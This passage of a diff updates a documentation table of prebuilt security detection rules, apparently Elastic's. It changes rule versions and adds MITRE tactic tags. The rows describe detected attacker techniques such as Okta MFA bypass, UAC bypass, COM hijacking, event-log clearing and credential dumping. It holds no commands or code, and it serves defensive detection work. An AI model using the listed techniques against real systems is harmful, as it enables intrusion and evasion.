Okta API token to disrupt an organization's business operations. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Impact] |8.10.0 |206 |<<attempt-to-unload-elastic-endpoint-security-kernel-extension, Attempt to Unload Elastic Endpoint Security Kernel Extension>> |Identifies attempts to unload the Elastic Endpoint Security kernel extension via the kextunload command. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |104 -|<<attempted-bypass-of-okta-mfa, Attempted Bypass of Okta MFA>> |Detects attempts to bypass Okta multi-factor authentication (MFA). An adversary may attempt to bypass the Okta MFA policies configured for an organization in order to obtain unauthorized access to an application. |[Data Source: Okta], [Use Case: Identity and Access Audit], [Tactic: Credential Access] |8.3.0 |106 +|<<attempted-bypass-of-okta-mfa, Attempted Bypass of Okta MFA>> |Detects attempts to bypass Okta multi-factor authentication (MFA). An adversary may attempt to bypass the Okta MFA policies configured for an organization in order to obtain unauthorized access to an application. |[Data Source: Okta], [Use Case: Identity and Access Audit], [Tactic: Credential Access] |8.10.0 |207 |<<attempted-private-key-access, Attempted Private Key Access>> |Attackers may try to access private keys, e.g. ssh, in order to gain further authenticated access to the environment. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 |<<attempts-to-brute-force-a-microsoft-365-user-account, Attempts to Brute Force a Microsoft 365 User Account>> |Identifies attempts to brute force a Microsoft 365 user account. An adversary may attempt a brute force attack to obtain unauthorized access to user accounts. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Identity and Access Audit], [Tactic: Credential Access] |8.3.0 |102 -|<<attempts-to-brute-force-an-okta-user-account, Attempts to Brute Force an Okta User Account>> |Identifies when an Okta user account is locked out 3 times within a 3 hour window. An adversary may attempt a brute force or password spraying attack to obtain unauthorized access to user accounts. The default Okta authentication policy ensures that a user account is locked out after 10 failed authentication attempts. |[Use Case: Identity and Access Audit], [Tactic: Credential Access], [Data Source: Okta] |8.3.0 |106 +|<<attempts-to-brute-force-an-okta-user-account, Attempts to Brute Force an Okta User Account>> |Identifies when an Okta user account is locked out 3 times within a 3 hour window. An adversary may attempt a brute force or password spraying attack to obtain unauthorized access to user accounts. The default Okta authentication policy ensures that a user account is locked out after 10 failed authentication attempts. |[Use Case: Identity and Access Audit], [Tactic: Credential Access], [Data Source: Okta] |8.10.0 |207 |<<authorization-plugin-modification, Authorization Plugin Modification>> |Authorization plugins are used to extend the authorization services API and implement mechanisms that are not natively supported by the OS, such as multi-factor authentication with third party software. Adversaries may abuse this feature to persist and/or collect clear text credentials as they traverse the registered plugins during user logon. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |104 @@ -314,55 +316,55 @@ and their rule type is `machine_learning`. |<<azure-virtual-network-device-modified-or-deleted, Azure Virtual Network Device Modified or Deleted>> |Identifies when a virtual network device is modified or deleted. This can be a network virtual appliance, virtual hub, or virtual router. |[Domain: Cloud], [Data Source: Azure], [Use Case: Network Security Monitoring], [Tactic: Impact] |8.3.0 |102 -|<<bpf-filter-applied-using-tc, BPF filter applied using TC>> |Detects when the tc (transmission control) binary is utilized to set a BPF (Berkeley Packet Filter) on a network interface. Tc is used to configure Traffic Control in the Linux kernel. It can shape, schedule, police and drop traffic. A threat actor can utilize tc to set a bpf filter on an interface for the purpose of manipulating the incoming traffic. This technique is not at all common and should indicate abnormal, suspicious or malicious activity. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Threat: TripleCross], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<bpf-filter-applied-using-tc, BPF filter applied using TC>> |Detects when the tc (transmission control) binary is utilized to set a BPF (Berkeley Packet Filter) on a network interface. Tc is used to configure Traffic Control in the Linux kernel. It can shape, schedule, police and drop traffic. A threat actor can utilize tc to set a bpf filter on an interface for the purpose of manipulating the incoming traffic. This technique is not at all common and should indicate abnormal, suspicious or malicious activity. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Threat: TripleCross], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<base16-or-base32-encoding-decoding-activity, Base16 or Base32 Encoding/Decoding Activity>> |Adversaries may encode/decode data in an attempt to evade detection by host- or network-based security controls. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<base16-or-base32-encoding-decoding-activity, Base16 or Base32 Encoding/Decoding Activity>> |Adversaries may encode/decode data in an attempt to evade detection by host- or network-based security controls. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<bash-shell-profile-modification, Bash Shell Profile Modification>> |Both ~/.bash_profile and ~/.bashrc are files containing shell commands that are run when Bash is invoked. These files are executed in a user's context, either interactively or non-interactively, when a user logs in so that their environment is set correctly. Adversaries may abuse this to establish persistence by executing malicious content triggered by a user’s shell. |[Domain: Endpoint], [OS: macOS], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |103 +|<<bash-shell-profile-modification, Bash Shell Profile Modification>> |Both ~/.bash_profile and ~/.bashrc are files containing shell commands that are run when Bash is invoked. These files are executed in a user's context, either interactively or non-interactively, when a user logs in so that their environment is set correctly. Adversaries may abuse this to establish persistence by executing malicious content triggered by a user’s shell. |[Domain: Endpoint], [OS: macOS], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |104 -|<<binary-content-copy-via-cmd-exe, Binary Content Copy via Cmd.exe>> |Attackers may abuse cmd.exe commands to reassemble binary fragments into a malicious payload. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 +|<<binary-content-copy-via-cmd-exe, Binary Content Copy via Cmd.exe>> |Attackers may abuse cmd.exe commands to reassemble binary fragments into a malicious payload. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |2 -|<<binary-executed-from-shared-memory-directory, Binary Executed from Shared Memory Directory>> |Identifies the execution of a binary by root in Linux shared memory directories: (/dev/shm/, /run/shm/, /var/run/, /var/lock/). This activity is to be considered highly abnormal and should be investigated. Threat actors have placed executables used for persistence on high-uptime servers in these directories as system backdoors. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Threat: BPFDoor], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<binary-executed-from-shared-memory-directory, Binary Executed from Shared Memory Directory>> |Identifies the execution of a binary by root in Linux shared memory directories: (/dev/shm/, /run/shm/, /var/run/, /var/lock/). This activity is to be considered highly abnormal and should be investigated. Threat actors have placed executables used for persistence on high-uptime servers in these directories as system backdoors. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Threat: BPFDoor], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 |<<bitsadmin-activity, Bitsadmin Activity>> |Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism. Adversaries may abuse BITS to persist, download, execute, and even clean up after running malicious code. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 |<<browser-extension-install, Browser Extension Install>> |Identifies the install of browser extensions. Malicious browser extensions can be installed via app store downloads masquerading as legitimate extensions, social engineering, or by an adversary that has already compromised a system. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 -|<<bypass-uac-via-event-viewer, Bypass UAC via Event Viewer>> |Identifies User Account Control (UAC) bypass via eventvwr.exe. Attackers bypass UAC to stealthily execute code with elevated permissions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<bypass-uac-via-event-viewer, Bypass UAC via Event Viewer>> |Identifies User Account Control (UAC) bypass via eventvwr.exe. Attackers bypass UAC to stealthily execute code with elevated permissions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 -|<<bypass-uac-via-sdclt, Bypass UAC via Sdclt>> |Identifies User Account Control (UAC) bypass via sdclt.exe. Attackers bypass UAC to stealthily execute code with elevated permissions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Defend] |None |1 +|<<bypass-uac-via-sdclt, Bypass UAC via Sdclt>> |Identifies User Account Control (UAC) bypass via sdclt.exe. Attackers bypass UAC to stealthily execute code with elevated permissions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |None |1 -|<<chkconfig-service-add, Chkconfig Service Add>> |Detects the use of the chkconfig binary to manually add a service for management by chkconfig. Threat actors may utilize this technique to maintain persistence on a system. When a new service is added, chkconfig ensures that the service has either a start or a kill entry in every runlevel and when the system is rebooted the service file added will run providing long-term persistence. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Threat: Lightning Framework], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<chkconfig-service-add, Chkconfig Service Add>> |Detects the use of the chkconfig binary to manually add a service for management by chkconfig. Threat actors may utilize this technique to maintain persistence on a system. When a new service is added, chkconfig ensures that the service has either a start or a kill entry in every runlevel and when the system is rebooted the service file added will run providing long-term persistence. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Threat: Lightning Framework], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<clearing-windows-console-history, Clearing Windows Console History>> |Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<clearing-windows-console-history, Clearing Windows Console History>> |Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<clearing-windows-event-logs, Clearing Windows Event Logs>> |Identifies attempts to clear or disable Windows event log stores using Windows wevetutil command. This is often done by attackers in an attempt to evade detection or destroy forensic evidence on a system. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<clearing-windows-event-logs, Clearing Windows Event Logs>> |Identifies attempts to clear or disable Windows event log stores using Windows wevetutil command. This is often done by attackers in an attempt to evade detection or destroy forensic evidence on a system. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 -|<<cobalt-strike-command-and-control-beacon, Cobalt Strike Command and Control Beacon>> |Cobalt Strike is a threat emulation platform commonly modified and used by adversaries to conduct network attack and exploitation campaigns. This rule detects a network activity algorithm leveraged by Cobalt Strike implant beacons for command and control. |[Use Case: Threat Detection], [Tactic: Command and Control], [Domain: Endpoint] |8.3.0 |104 +|<<cobalt-strike-command-and-control-beacon, Cobalt Strike Command and Control Beacon>> |Cobalt Strike is a threat emulation platform commonly modified and used by adversaries to conduct network attack and exploitation campaigns. This rule detects a network activity algorithm leveraged by Cobalt Strike implant beacons for command and control. |[Use Case: Threat Detection], [Tactic: Command and Control], [Domain: Endpoint] |8.3.0 |105 |<<code-signing-policy-modification-through-built-in-tools, Code Signing Policy Modification Through Built-in tools>> |Identifies attempts to disable/modify the code signing policy through system native utilities. Code signing provides authenticity on a program, and grants the user with the ability to check whether the program has been tampered with. By allowing the execution of unsigned or self-signed code, threat actors can craft and execute malicious code. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |5 -|<<code-signing-policy-modification-through-registry, Code Signing Policy Modification Through Registry>> |Identifies attempts to disable/modify the code signing policy through the registry. Code signing provides authenticity on a program, and grants the user with the ability to check whether the program has been tampered with. By allowing the execution of unsigned or self-signed code, threat actors can craft and execute malicious code. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |5 +|<<code-signing-policy-modification-through-registry, Code Signing Policy Modification Through Registry>> |Identifies attempts to disable/modify the code signing policy through the registry. Code signing provides authenticity on a program, and grants the user with the ability to check whether the program has been tampered with. By allowing the execution of unsigned or self-signed code, threat actors can craft and execute malicious code. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |6 -|<<command-execution-via-solarwinds-process, Command Execution via SolarWinds Process>> |A suspicious SolarWinds child process (Cmd.exe or Powershell.exe) was detected. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<command-execution-via-solarwinds-process, Command Execution via SolarWinds Process>> |A suspicious SolarWinds child process (Cmd.exe or Powershell.exe) was detected. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Initial Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 |<<command-prompt-network-connection, Command Prompt Network Connection>> |Identifies cmd.exe making a network connection. Adversaries could abuse cmd.exe to download or execute malware from a remote URL. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |105 -|<<command-shell-activity-started-via-rundll32, Command Shell Activity Started via RunDLL32>> |Identifies command shell activity started via RunDLL32, which is commonly abused by attackers to host malicious code. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<command-shell-activity-started-via-rundll32, Command Shell Activity Started via RunDLL32>> |Identifies command shell activity started via RunDLL32, which is commonly abused by attackers to host malicious code. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Credential Access], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<component-object-model-hijacking, Component Object Model Hijacking>> |Identifies Component Object Model (COM) hijacking via registry modification. Adversaries may establish persistence by executing malicious content triggered by hijacked references to COM objects. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<component-object-model-hijacking, Component Object Model Hijacking>> |Identifies Component Object Model (COM) hijacking via registry modification. Adversaries may establish persistence by executing malicious content triggered by hijacked references to COM objects. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Tactic: Privilege Escalation], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 |<<compression-dll-loaded-by-unusual-process, Compression DLL Loaded by Unusual Process>> |Identifies the image load of a compression DLL. Adversaries will often compress and encrypt data in preparation for exfiltration. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |2 -|<<conhost-spawned-by-suspicious-parent-process, Conhost Spawned By Suspicious Parent Process>> |Detects when the Console Window Host (conhost.exe) process is spawned by a suspicious parent process, which could be indicative of code injection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<conhost-spawned-by-suspicious-parent-process, Conhost Spawned By Suspicious Parent Process>> |Detects when the Console Window Host (conhost.exe) process is spawned by a suspicious parent process, which could be indicative of code injection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Defense Evasion], [Tactic: Privilege Escalation], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 |<<connection-to-commonly-abused-free-ssl-certificate-providers, Connection to Commonly Abused Free SSL Certificate Providers>> |Identifies unusual processes connecting to domains using known free SSL certificates. Adversaries may employ a known encryption algorithm to conceal command and control traffic. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend] |8.3.0 |104 -|<<connection-to-commonly-abused-web-services, Connection to Commonly Abused Web Services>> |Adversaries may implement command and control (C2) communications that use common web services to hide their activity. This attack technique is typically targeted at an organization and uses web services common to the victim network, which allows the adversary to blend into legitimate traffic activity. These popular services are typically targeted since they have most likely been used before compromise, which helps malicious traffic blend in. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 +|<<connection-to-commonly-abused-web-services, Connection to Commonly Abused Web Services>> |Adversaries may implement command and control (C2) communications that use common web services to hide their activity. This attack technique is typically targeted at an organization and uses web services common to the victim network, which allows the adversary to blend into legitimate traffic activity. These popular services are typically targeted since they have most likely been used before compromise, which helps malicious traffic blend in. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |108 -|<<connection-to-external-network-via-telnet, Connection to External Network via Telnet>> |Telnet provides a command line interface for communication with a remote device or server. This rule identifies Telnet network connections to publicly routable IP addresses. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend] |8.3.0 |104 +|<<connection-to-external-network-via-telnet, Connection to External Network via Telnet>> |Telnet provides a command line interface for communication with a remote device or server. This rule identifies Telnet network connections to publicly routable IP addresses. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend] |8.3.0 |105 -|<<connection-to-internal-network-via-telnet, Connection to Internal Network via Telnet>> |Telnet provides a command line interface for communication with a remote device or server. This rule identifies Telnet network connections to non-publicly routable IP addresses. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend] |8.3.0 |104 +|<<connection-to-internal-network-via-telnet, Connection to Internal Network via Telnet>> |Telnet provides a command line interface for communication with a remote device or server. This rule identifies Telnet network connections to non-publicly routable IP addresses. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend] |8.3.0 |105 |<<container-management-utility-run-inside-a-container, Container Management Utility Run Inside A Container>> |This rule detects when a container management binary is run from inside a container. These binaries are critical components of many containerized environments, and their presence and execution in unauthorized containers could indicate compromise or a misconfiguration. |[Data Source: Elastic Defend for Containers], [Domain: Container], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution] |8.8.0 |2 @@ -370,13 +372,13 @@ and their rule type is `machine_learning`. |<<control-panel-process-with-unusual-arguments, Control Panel Process with Unusual Arguments>> |Identifies unusual instances of Control Panel with suspicious keywords or paths in the process command line value. Adversaries may abuse control.exe to proxy execution of malicious code. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<creation-of-hidden-files-and-directories-via-commandline, Creation of Hidden Files and Directories via CommandLine>> |Users can mark specific files as hidden simply by putting a "." as the first character in the file or folder name. Adversaries can use this to their advantage to hide files and folders on the system for persistence and defense evasion. This rule looks for hidden files or folders in common writable directories. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |105 +|<<creation-of-hidden-files-and-directories-via-commandline, Creation of Hidden Files and Directories via CommandLine>> |Users can mark specific files as hidden simply by putting a "." as the first character in the file or folder name. Adversaries can use this to their advantage to hide files and folders on the system for persistence and defense evasion. This rule looks for hidden files or folders in common writable directories. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |106 |<<creation-of-hidden-launch-agent-or-daemon, Creation of Hidden Launch Agent or Daemon>> |Identifies the creation of a hidden launch agent or daemon. An adversary may establish persistence by installing a new launch agent or daemon which executes at login. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |104 |<<creation-of-hidden-login-item-via-apple-script, Creation of Hidden Login Item via Apple Script>> |Identifies the execution of osascript to create a hidden login item. This may indicate an attempt to persist a malicious program while concealing its presence. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |105 -|<<creation-of-hidden-shared-object-file, Creation of Hidden Shared Object File>> |Identifies the creation of a hidden shared object (.so) file. Users can mark specific files as hidden simply by putting a "." as the first character in the file or folder name. Adversaries can use this to their advantage to hide files and folders on the system for persistence and defense evasion. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<creation-of-hidden-shared-object-file, Creation of Hidden Shared Object File>> |Identifies the creation of a hidden shared object (.so) file. Users can mark specific files as hidden simply by putting a "." as the first character in the file or folder name. Adversaries can use this to their advantage to hide files and folders on the system for persistence and defense evasion. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 |<<creation-of-kernel-module, Creation of Kernel Module>> |Identifies activity related to loading kernel modules on Linux via creation of new ko files in the LKM directory. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |1 @@ -388,7 +390,7 @@ and their rule type is `machine_learning`. |<<creation-or-modification-of-root-certificate, Creation or Modification of Root Certificate>> |Identifies the creation or modification of a local trusted root certificate in Windows. The install of a malicious root certificate would allow an attacker the ability to masquerade malicious files as valid signed components from any entity (for example, Microsoft). It could also allow an attacker to decrypt SSL traffic. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<creation-or-modification-of-a-new-gpo-scheduled-task-or-service, Creation or Modification of a new GPO Scheduled Task or Service>> |Detects the creation or modification of a new Group Policy based scheduled task or service. These methods are used for legitimate system administration, but can also be abused by an attacker with domain admin permissions to execute a malicious payload remotely on all or a subset of the domain joined machines. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<creation-or-modification-of-a-new-gpo-scheduled-task-or-service, Creation or Modification of a new GPO Scheduled Task or Service>> |Detects the creation or modification of a new Group Policy based scheduled task or service. These methods are used for legitimate system administration, but can also be abused by an attacker with domain admin permissions to execute a malicious payload remotely on all or a subset of the domain joined machines. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 |<<credential-acquisition-via-registry-hive-dumping, Credential Acquisition via Registry Hive Dumping>> |Identifies attempts to export a registry hive which may contain credentials using the Windows reg.exe tool. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 @@ -400,7 +402,7 @@ and their rule type is `machine_learning`. |<<credential-manipulation-prevented-elastic-endgame, Credential Manipulation - Prevented - Elastic Endgame>> |Elastic Endgame prevented Credential Manipulation. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information. |[Data Source: Elastic Endgame], [Use Case: Threat Detection], [Tactic: Privilege Escalation] |8.3.0 |101 -|<<cron-job-created-or-changed-by-previously-unknown-process, Cron Job Created or Changed by Previously Unknown Process>> |Linux cron jobs are scheduled tasks that can be leveraged by malicious actors for persistence, privilege escalation and command execution. By creating or modifying cron job configurations, attackers can execute malicious commands or scripts at predefined intervals, ensuring their continued presence and enabling unauthorized activities. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.6.0 |4 +|<<cron-job-created-or-changed-by-previously-unknown-process, Cron Job Created or Changed by Previously Unknown Process>> |Linux cron jobs are scheduled tasks that can be leveraged by malicious actors for persistence, privilege escalation and command execution. By creating or modifying cron job configurations, attackers can execute malicious commands or scripts at predefined intervals, ensuring their continued presence and enabling unauthorized activities. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.6.0 |5 |<<cyberark-privileged-access-security-error, CyberArk Privileged Access Security Error>> |Identifies the occurrence of a CyberArk Privileged Access Security (PAS) error level audit event. The event.code correlates to the CyberArk Vault Audit Action Code. |[Data Source: CyberArk PAS], [Use Case: Log Auditing], [Use Case: Threat Detection], [Tactic: Privilege Escalation] |8.3.0 |102 @@ -408,27 +410,27 @@ and their rule type is `machine_learning`. |<<dns-tunneling, DNS Tunneling>> |A machine learning job detected unusually large numbers of DNS queries for a single top-level DNS domain, which is often used for DNS tunneling. DNS tunneling can be used for command-and-control, persistence, or data exfiltration activity. For example, dnscat tends to generate many DNS questions for a top-level domain as it uses the DNS protocol to tunnel data. |[Use Case: Threat Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Command and Control] |8.3.0 |103 -|<<dns-over-https-enabled-via-registry, DNS-over-HTTPS Enabled via Registry>> |Identifies when a user enables DNS-over-HTTPS. This can be used to hide internet activity or the process of exfiltrating data. With this enabled, an organization will lose visibility into data such as query type, response, and originating IP, which are used to determine bad actors. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<dns-over-https-enabled-via-registry, DNS-over-HTTPS Enabled via Registry>> |Identifies when a user enables DNS-over-HTTPS. This can be used to hide internet activity or the process of exfiltrating data. With this enabled, an organization will lose visibility into data such as query type, response, and originating IP, which are used to determine bad actors. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 |<<default-cobalt-strike-team-server-certificate, Default Cobalt Strike Team Server Certificate>> |This rule detects the use of the default Cobalt Strike Team Server TLS certificate. Cobalt Strike is software for Adversary Simulations and Red Team Operations which are security assessments that replicate the tactics and techniques of an advanced adversary in a network. Modifications to the Packetbeat configuration can be made to include MD5 and SHA256 hashing algorithms (the default is SHA1). See the References section for additional information on module configuration. |[Tactic: Command and Control], [Threat: Cobalt Strike], [Use Case: Threat Detection], [Domain: Endpoint] |8.3.0 |104 -|<<delete-volume-usn-journal-with-fsutil, Delete Volume USN Journal with Fsutil>> |Identifies use of the fsutil.exe to delete the volume USNJRNL. This technique is used by attackers to eliminate evidence of files created during post-exploitation activities. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 +|<<delayed-execution-via-ping, Delayed Execution via Ping>> |Identifies the execution of commonly abused Windows utilities via a delayed Ping execution. This behavior is often observed during malware installation and is consistent with an attacker attempting to evade detection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 -|<<deleting-backup-catalogs-with-wbadmin, Deleting Backup Catalogs with Wbadmin>> |Identifies use of the wbadmin.exe to delete the backup catalog. Ransomware and other malware may do this to prevent system recovery. |[Domain: Endpoint], [OS: Windows], [Use 